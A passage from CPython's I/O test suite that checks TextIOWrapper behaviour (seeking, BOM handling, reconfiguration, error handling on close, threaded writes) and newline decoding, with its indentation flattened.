t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
# default chunk size is 8192 bytes so t don't write data to buf.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
